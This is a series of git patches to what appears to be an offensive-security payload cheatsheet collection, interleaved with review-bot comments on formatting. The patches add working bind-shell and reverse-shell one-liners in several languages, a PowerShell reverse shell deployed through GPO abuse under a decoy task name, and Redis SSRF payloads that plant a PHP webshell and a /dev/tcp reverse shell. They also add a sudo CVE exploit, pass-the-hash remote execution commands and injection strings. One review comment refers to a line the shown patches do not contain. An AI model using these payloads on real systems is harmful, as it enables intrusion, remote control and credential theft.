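Review bot: typo in the added reference line of `Insecure Deserialization/PHP.md`: `Jack The Ripper Web challeneg Write-up` should be `challenge`. The TSULOTT link is changed from a lowercase anchor to `#TSULOTT-Web`; worth confirming the new anchor resolves, since the other Rawsec link in the same hunk uses a different case convention.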
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 24 May 2020 14:09:46 +0200 Subject: [PATCH 62/85] Bind shell cheatsheet (Fix #194) --- CORS Misconfiguration/README.md | 5 ++ Command Injection/README.md | 14 ++-- .../Active Directory Attack.md | 18 ++++- .../Bind Shell Cheatsheet.md | 71 +++++++++++++++++++ .../Network Pivoting Techniques.md | 3 + .../Reverse Shell Cheatsheet.md | 5 ++ NoSQL Injection/README.md | 5 +- SQL Injection/README.md | 4 +- Server Side Request Forgery/README.md | 19 +++++ XPATH Injection/README.md | 3 + 10 files changed, 134 insertions(+), 13 deletions(-) create mode 100644 Methodology and Resources/Bind Shell Cheatsheet.md diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index 1bbbc7e..138fb1c 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -4,10 +4,15 @@ ## Summary +* [Tools](#tools) * [Prerequisites](#prerequisites) * [Exploitation](#exploitation) * [References](#references) +## Tools + +* [Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3vCorsy/) + ## Prerequisites * BURP HEADER> `Origin: https://evil.com` diff --git a/Command Injection/README.md b/Command Injection/README.md index 8370522..ba3850f 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -111,8 +111,9 @@ something%0Acat%20/etc/passwd ### Bypass characters filter via hex encoding -linux -``` +Linux + +```powershell swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" /etc/passwd 
@@ -136,29 +137,22 @@ swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764) swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)` root:x:0:0:root:/root:/bin/bash - ``` ### Bypass characters filter Commands execution without backslash and slash - linux bash -``` +```powershell swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1} -/ swissky@crashlab▸ ~ ▸ $ cat ${HOME:0:1}etc${HOME:0:1}passwd root:x:0:0:root:/root:/bin/bash swissky@crashlab▸ ~ ▸ $ echo . | tr '!-0' '"-1' -/ - swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< . -/ - swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd root:x:0:0:root:/root:/bin/bash - ``` ### Bypass Blacklisted words diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 12efdd6..7a97f84 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
@@ -427,7 +427,23 @@ SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContent SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" ``` -Abuse GPO with PowerView +Abuse GPO with **pyGPOAbuse** + +```powershell +git clone https://github.com/Hackndo/pyGPOAbuse +# Add john user to local administrators group (Password: H4x00r123..) +./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" + +# Reverse shell example +./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ + -powershell \ + -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ + -taskname "Completely Legit Task" \ + -description "Dis is legit, pliz no delete" \ + -user +``` + +Abuse GPO with **PowerView** ```powershell # Enumerate GPO diff --git a/Methodology and Resources/Bind Shell Cheatsheet.md b/Methodology and Resources/Bind Shell Cheatsheet.md new file mode 100644 index 0000000..73df69d --- /dev/null +++ b/Methodology and Resources/Bind Shell Cheatsheet.md 
@@ -0,0 +1,71 @@ +# Bind Shell + +## Summary + +* [Reverse Shell](#reverse-shell) + * [Perl](#perl) + * [Python](#python) + * [PHP](#php) + * [Ruby](#ruby) + * [Netcat Traditional](#netcat-traditional) + * [Netcat OpenBsd](#netcat-openbsd) + * [Ncat](#ncat) + * [Socat](#socat) + * [Powershell](#powershell) + + +## Perl + +```perl +perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\ +bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\ +close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};' +``` + +## PHP + +```php +php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\ +socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\ +$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\ + socket_write($cl,$m,strlen($m));}}' +``` + +## Ruby + +```ruby +ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)' +``` + +## Netcat Traditional + +```powershell +nc -nlvp 51337 -e /bin/bash +``` + +## Netcat OpenBsd + +```powershell +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f +``` + +## Socat + +```powershell +user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 +user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane +``` + +## Powershell + +```powershell +https://github.com/besimorhino/powercat + +# Victim (listen) +. .\powercat.ps1 +powercat -l -p 7002 -ep + +# Connect from attacker +. .\powercat.ps1 +powercat -c 127.0.0.1 -p 7002 +``` \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index f2fbcd6..78958b0 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md 
@@ -154,6 +154,9 @@ sshuttle -vvr username@pivot_host 10.2.2.0/24 # using a private key $ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" + +# -x == exclude some network to not transmit over the tunnel +# -x x.x.x.x.x/24 ``` ## chisel diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index a728c33..0362a8a 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -114,6 +114,11 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1 ```bash php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;' +php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");' ``` ```bash diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index 7c203b8..cebfe1b 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md @@ -27,8 +27,11 @@ Basic authentication bypass using not equal ($ne) or greater ($gt) ```json -in URL +in DATA username[$ne]=toto&password[$ne]=toto +login[$regex]=a.*&pass[$ne]=lol +login[$gt]=admin&login[$lt]=test&pass[$ne]=1 +login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto in JSON {"username": {"$ne": null}, "password": {"$ne": null}} diff --git a/SQL Injection/README.md b/SQL Injection/README.md index f3eeb33..353feca 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md 
@@ -31,6 +31,7 @@ Attempting to manipulate SQL queries may have goals including: * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list) * [Authentication bypass](#authentication-bypass) + * [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1) * [Polyglot injection](#polyglot-injection-multicontext) * [Routed injection](#routed-injection) * [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update) @@ -365,7 +366,7 @@ admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 ``` -## Authentication Bypass (Raw MD5) +## Authentication Bypass (Raw MD5 SHA1) When a raw md5 is used, the pass will be queried as a simple string, not a hexstring. @@ -377,6 +378,7 @@ Allowing an attacker to craft a string with a `true` statement such as `' or 'SO ```php md5("ffifdyop", true) = 'or'6�]��!r,��b +sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-! ``` Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index da3fcfa..964f300 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -31,6 +31,7 @@ * [gopher://](#gopher) * [netdoc://](#netdoc) * [SSRF exploiting WSGI](#ssrf-exploiting-wsgi) +* [SSRF exploiting Redis](#ssrf-exploiting-redis) * [SSRF to XSS](#ssrf-to-xss) * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) 
@@ -388,6 +389,24 @@ gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py | value data | (n bytes) | | /tmp/test.py | | +## SSRF exploiting Redis + +> Redis is a database system that stores everything in RAM + +```powershell +# Getting a webshell +url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html +url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php +url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp system($_GET[0])\x3F>" +url=dict://127.0.0.1:6379/SAVE + +# Getting a PHP reverse shell +gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml +gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php +gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22 +gopher://127.0.0.1:6379/_save +``` + ## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md index bcbe72e..6e0ac6d 100644 --- a/XPATH Injection/README.md +++ b/XPATH Injection/README.md @@ -28,6 +28,9 @@ x' or name()='username' or 'x'='y ' and count(/*)=1 and '1'='1 ' and count(/@*)=1 and '1'='1 ' and count(/comment())=1 and '1'='1 +search=')] | //user/*[contains(*,' +search=Har') and contains(../password,'c +search=Har') and starts-with(../password,'c ``` ## Blind Exploitation From 5b47fc8ead951df64fbc928efbe8a2d2a4f734e4 Mon Sep 17 00:00:00 2001 From: c14dd49h <47661120+c14dd49h@users.noreply.github.com> Date: Wed, 27 May 2020 18:53:37 +0200 Subject: [PATCH 63/85] Update README.md --- SQL Injection/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 353feca..1ab29b8 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md 
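Review bot: the Corsy link in the new Tools section of `CORS Misconfiguration/README.md` is malformed: `https://github.com/s0md3vCorsy/` is missing the separator between owner and repository (`s0md3v/Corsy`), so it 404s as written.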
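Review bot: in the hex-encoding hunk of `Command Injection/README.md` the fence is retagged `powershell` for what is a Linux `echo -e` / `xxd` session; since the heading on the same hunk was just changed to `Linux`, tag it `bash` so highlighting matches the content.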
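Review bot: in the `Commands execution without backslash and slash` hunk, the deleted `/` lines were the output of `echo ${HOME:0:1}`, `echo . | tr '!-0' '"-1'` and `tr '!-0' '"-1' <<< .`; they are what shows the reader that each expression evaluates to a slash, and the `cat ... passwd` lines in the same block keep their output. Keep the `/` lines (or add `# prints /` comments) rather than dropping them.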
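Review bot: the comment `# Add john user to local administrators group (Password: H4x00r123..)` above the first `pygpoabuse.py` line in `Active Directory Attack.md` names a user and password that never appear in the command, so either these are the tool's defaults (say so) or the options that set them are missing. `"12345677-ABCD-9876-ABCD-123456789012"` is a placeholder GPO id and should be labelled as such, like `lm:nt` on the same line.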
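Review bot: the Summary of the new `Bind Shell Cheatsheet.md` is titled `Reverse Shell` and lists `Python` and `Ncat`, but the file has no such sections (only Perl, PHP, Ruby, Netcat Traditional, Netcat OpenBsd, Socat and Powershell), so the heading should read `Bind Shell` and the two dangling entries be dropped or their sections written. The file also lacks a trailing newline, and the Netcat, Socat and Powershell fences are tagged `powershell` for shell commands.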
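Review bot: `# -x x.x.x.x.x/24` in the sshuttle hunk of `Network Pivoting Techniques.md` has five octets; it should be `x.x.x.x/24`.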
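Review bot: the NoSQL hunk keeps the ```json tag on a block whose first part (`username[$ne]=toto&password[$ne]=toto`, `login[$regex]=a.*&pass[$ne]=lol`, ...) is URL-encoded form data, not JSON; split the `in DATA` lines into their own untagged block, or drop the `json` tag.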
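Review bot: the heading in `SQL Injection/README.md` now reads `Authentication Bypass (Raw MD5 SHA1)`, but the explanatory sentence kept as context right under it still says `When a raw md5 is used`; update it to cover both digests (for example `When a raw md5 or sha1 digest is used`).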
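Review bot: the added `sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-!` line has had its non-printable bytes replaced by U+FFFD, so the value shown is not reproducible from the page; show the digest as hex or escaped bytes next to it, and state that the trailing space in `"3fDf "` is part of the input, since it is easy to lose when copying.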
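Review bot: the new `SSRF exploiting Redis` section does not state its preconditions, which are also the controls that stop it: a Redis reachable on `127.0.0.1:6379` with no authentication (none of the `dict://` or `gopher://` lines sends an `AUTH`), and a Redis process allowed to write into the web root (`CONFIG SET dir /var/www/html`). Add a sentence on that above the block, and explain the leading `_` in the gopher payloads, which a reader unfamiliar with the gopher URL format will not recognise.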
@@ -344,6 +344,7 @@ admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- +admin';-- azer admin" # admin"/* admin" or "1"="1 From 5323ceb37c4eb4b98b82d0ad2cfe07cc390f8b0e Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 28 May 2020 11:19:16 +0200 Subject: [PATCH 64/85] SUDO CVE + Windows Drivers PrivEsc --- .../Active Directory Attack.md | 4 +- .../Linux - Privilege Escalation.md | 13 ++ .../Windows - Privilege Escalation.md | 26 ++++ .../Windows - Using credentials.md | 119 ++++++++++++------ 4 files changed, 121 insertions(+), 41 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 7a97f84..0e206fa 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -767,8 +767,8 @@ Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-fe Then crack the ticket with hashcat or john ```powershell -hashcat -m 13100 -a 0 hash.txt crackstation.txt -./john ~/hash.txt --wordlist=rockyou.lst +./hashcat -m 13100 -a 0 kerberos_hashes.txt crackstation.txt +./john --wordlist=/opt/wordlists/rockyou.txt --fork=4 --format=krb5tgs ~/kerberos_hashes.txt ``` Mitigations: diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index db7a558..acc6b89 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -28,6 +28,7 @@ * [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd) * [Doas](#doas) * [sudo_inject](#sudo-inject) + * [CVE-2019-14287](#cve-2019-14287) * [GTFOBins](#gtfobins) * [Wildcard](#wildcard) * [Writable files](#writable-files) 
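Review bot: `admin';-- azer` is added to the list with no comment; its purpose (presumably the extra token keeps the space required after `-- ` from being trimmed) is not obvious next to the other self-explanatory entries, so a short note would help.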
@@ -389,6 +390,7 @@ uid=0(root) gid=1000(swissky) | CAP_NET_BIND_SERVICE | SERVICE Bind a socket to internet domain privileged ports | ## SUDO + Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER) ### NOPASSWD @@ -459,6 +461,17 @@ uid=0(root) gid=0(root) groups=0(root) Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf) + +### CVE-2019-14287 + +```powershell +# Exploitable when a user have the following permissions (sudo -l) +(ALL, !root) ALL + +# If you have a full TTY, you can exploit it like this +sudo -u#-1 /bin/bash +``` + ## GTFOBins [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 095b4ed..7f77e38 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -28,6 +28,7 @@ * [EoP - Kernel Exploitation](#eop---kernel-exploitation) * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) +* [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers) * [EoP - Runas](#eop---runas) * [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies) * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) 
@@ -68,6 +69,11 @@ - [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits) - [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum) - [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt) + ```powershell + Seatbelt.exe -group=all -full + Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt" + Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\"" + ``` - [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless) - [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS) ```powershell 
@@ -738,6 +744,26 @@ Application running as SYSTEM allowing an user to spawn a CMD, or browse directo Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt" +## EoP - Evaluating Vulnerable Drivers +Look for vuln drivers loaded, we often don't spend enough time looking at this: + +```powershell +PS C:\Users\Swissky> driverquery.exe /fo table + +Module Name Display Name Driver Type Link Date +============ ====================== ============= ====================== +1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM +3ware 3ware Kernel 5/18/2015 6:28:03 PM +ACPI Microsoft ACPI Driver Kernel 12/9/1975 6:17:08 AM +AcpiDev ACPI Devices driver Kernel 12/7/1993 6:22:19 AM +acpiex Microsoft ACPIEx Drive Kernel 3/1/2087 8:53:50 AM +acpipagr ACPI Processor Aggrega Kernel 1/24/2081 8:36:36 AM +AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM +acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM +ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM + +``` + ## EoP - Runas Use the `cmdkey` to list the stored credentials on the machine. diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index eac15a9..c674732 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -14,7 +14,7 @@ * [Crackmapexec](#crackmapexec) * [Winexe](#winexe) * [WMI](#wmi) -* [Psexec.py / Smbexec.py / Wmiexec.py](#psexec.py---smbexec.py---wmiexec.py) +* [Psexec.py / Smbexec.py / Wmiexec.py](#psexecpy--smbexecpy--wmiexecpy) * [PsExec - Sysinternal](#psexec-sysinternal) * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [Netuse](#netuse) 
@@ -93,56 +93,96 @@ shell ## Crackmapexec -```python -git clone https://github.com/byt3bl33d3r/CrackMapExec.github -python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password -python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami -# pass the hash -cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth +```powershell +root@payload$ git clone https://github.com/byt3bl33d3r/CrackMapExec.github +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -x 'whoami' # cmd +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -X 'whoami' # powershell +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method atexec -x 'whoami' +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method wmiexec -x 'whoami' +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -x 'whoami' ``` ## Remote Code Execution with PS Credentials ```powershell -$SecPassword = ConvertTo-SecureString 'secretpassword' -AsPlainText -Force -$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword) -Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami} +PS C:\> $SecPassword = ConvertTo-SecureString 'secretpassword' -AsPlainText -Force +PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword) +PS C:\> Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami} ``` ## WinRM +Require: +* Port **5985** or **5986** open. 
+* Default endpoint is **/wsman** + ```powershell root@payload$ git clone https://github.com/Hackplayers/evil-winrm root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' ``` +or using a custom ruby code to interact with the WinRM service. + +```ruby +require 'winrm' + +conn = WinRM::Connection.new( + endpoint: 'http://ip:5985/wsman', + user: 'domain/user', + password: 'password', +) + +command="" +conn.shell(:powershell) do |shell| + until command == "exit\n" do + print "PS > " + command = gets + output = shell.run(command) do |stdout, stderr| + STDOUT.print stdout + STDERR.print stderr + end + end + puts "Exiting with code #{output.exitcode}" +end +``` + ## Winexe Integrated to Kali -```python -winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe +```powershell +root@payload$ winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe ``` ## WMI ```powershell -wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe” +PS C:\> wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe” ``` ## Psexec.py / Smbexec.py / Wmiexec.py from Impacket -```python -git clone https://github.com/CoreSecurity/impacket.git -python psexec.py DOMAIN/username:password@10.10.10.10 -python smbexec.py DOMAIN/username:password@10.10.10.10 -python wmiexec.py DOMAIN/username:password@10.10.10.10 +```powershell +root@payload$ git clone https://github.com/CoreSecurity/impacket.git -# psexec.exe -s cmd -# switch admin user to NT Authority/System +# PSEXEC like functionality example using RemComSv +root@payload$ python psexec.py DOMAIN/username:password@10.10.10.10 +# this will drop a binary on the disk = noisy + +# A similar 
approach to PSEXEC w/o using RemComSvc +root@payload$ python smbexec.py DOMAIN/username:password@10.10.10.10 + +# A semi-interactive shell, used through Windows Management Instrumentation. +root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10 + +# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. +root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10 + +# Executes a command on the target machine through the Task Scheduler service and returns the output of the executed command. +root@payload$ python dcomexec.py DOMAIN/username:password@10.10.10.10 ``` ## PsExec - Sysinternal @@ -150,8 +190,10 @@ python wmiexec.py DOMAIN/username:password@10.10.10.10 from Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) ```powershell -PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell +PS C:\> PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe + +# switch admin user to NT Authority/System +PS C:\> PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s ``` ## RDP Remote Desktop Protocol 
@@ -159,14 +201,14 @@ PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP) ```powershell -SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password +PS C:\> SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password ``` Or connect remotely with `rdesktop` ```powershell -rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare -rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10 +root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare +root@payload$ rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10 # -g : the screen will take up 70% of your actual screen size # -r disk:share : sharing a local folder during a remote desktop session ``` 
@@ -174,35 +216,35 @@ rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10 Note: you may need to enable it with the following command ```powershell -reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f -netsh firewall set service remoteadmin enable -netsh firewall set service remotedesktop enable +PS C:\> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f +PS C:\> netsh firewall set service remoteadmin enable +PS C:\> netsh firewall set service remotedesktop enable ``` or with psexec(sysinternals) ```powershell -psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 +PS C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 ``` or with crackmapexec ```powershell -crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable +root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable ``` or with Metasploit ```powershell -run getgui -u admin -p 1234 +root@payload$ run getgui -u admin -p 1234 ``` or with xfreerdp ```powershell -xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+ -xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group. 
